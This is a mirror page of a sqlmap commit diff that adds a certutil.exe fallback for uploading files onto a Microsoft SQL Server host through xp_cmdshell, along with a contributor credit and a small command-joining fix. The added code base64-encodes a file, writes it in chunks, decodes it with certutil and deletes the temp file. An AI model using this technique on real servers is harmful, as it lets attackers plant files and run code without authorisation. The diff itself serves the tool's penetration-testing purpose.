mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 09:36:35 +03:00
Merge of an Issue #1227
This commit is contained in:
parent
a94dcf94e9
commit
03f32ae2b6
|
@ -621,6 +621,9 @@ abc abc, <biedimc(at)gmx.net>
|
|||
Abuse 007, <abuse007(at)gmail.com>
|
||||
* for reporting a bug
|
||||
|
||||
agix, <florian.gaultier@gmail.com>
|
||||
* for contributing the file upload via certutil.exe functionality
|
||||
|
||||
Alex, <m3zero(at)gmail.com>
|
||||
* for reporting a minor bug
|
||||
|
||||
|
|
|
@ -142,13 +142,13 @@ class Xp_cmdshell:
|
|||
charCounter += len(echoedLine)
|
||||
|
||||
if charCounter >= maxLen:
|
||||
self.xpCmdshellExecCmd(cmd)
|
||||
self.xpCmdshellExecCmd(cmd.rstrip(" & "))
|
||||
|
||||
cmd = ""
|
||||
charCounter = 0
|
||||
|
||||
if cmd:
|
||||
self.xpCmdshellExecCmd(cmd)
|
||||
self.xpCmdshellExecCmd(cmd.rstrip(" & "))
|
||||
|
||||
def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
|
||||
# When user provides DBMS credentials (with --dbms-cred) we need to
|
||||
|
|
|
@ -337,6 +337,33 @@ class Filesystem(GenericFilesystem):
|
|||
|
||||
self.execCmd(complComm)
|
||||
|
||||
def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
|
||||
infoMsg = "using certutil.exe to write the %s " % fileType
|
||||
infoMsg += "file content to file '%s', please wait.." % dFile
|
||||
logger.info(infoMsg)
|
||||
|
||||
chunkMaxSize = 500
|
||||
dFileName = ntpath.basename(dFile)
|
||||
|
||||
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
|
||||
randFilePath = "%s\%s" % (tmpPath, randFile)
|
||||
|
||||
encodedFileContent = base64encode(wFileContent)
|
||||
|
||||
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
|
||||
|
||||
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
|
||||
|
||||
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
|
||||
|
||||
logger.debug("decoding the file to %s.." % dFile)
|
||||
|
||||
commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile),
|
||||
"del /F /Q %s" % randFile)
|
||||
complComm = " & ".join(command for command in commands)
|
||||
|
||||
self.execCmd(complComm)
|
||||
|
||||
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
|
||||
# NOTE: this is needed here because we use xp_cmdshell extended
|
||||
# procedure to write a file on the back-end Microsoft SQL Server
|
||||
|
@ -371,4 +398,13 @@ class Filesystem(GenericFilesystem):
|
|||
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
|
||||
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
||||
|
||||
if written is False:
|
||||
message = "do you want to try to upload the file with "
|
||||
message += "the built-in certutil.exe technique? [Y/n] "
|
||||
choice = readInput(message, default="Y")
|
||||
|
||||
if not choice or choice.lower() == "y":
|
||||
self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType)
|
||||
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
||||
|
||||
return written
|
||||
|
|
Loading…
Reference in New Issue
Block a user